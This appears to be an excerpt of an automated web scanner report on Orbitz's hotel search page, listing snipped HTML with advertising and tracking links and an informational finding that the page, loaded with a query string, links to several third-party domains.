<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad searchFormAd"><a href="http://www.revresda.com/click.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchForm/telesales/ORB_Telesales_HotelSearchBot-1.png" alt="Call us to book 1-800-649-9920" height="54" width="364" />
    </div>
...[SNIP]...
<div class="ad adBelowSearchForm"><a href="http://www.revresda.com/click.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>


            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<div class="ad americanExpress"><a href="http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...

<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296573792737&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<noscript> <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.365. http://www.orbitz.com/hotels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/hotels/?z=2eb8&r=b

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
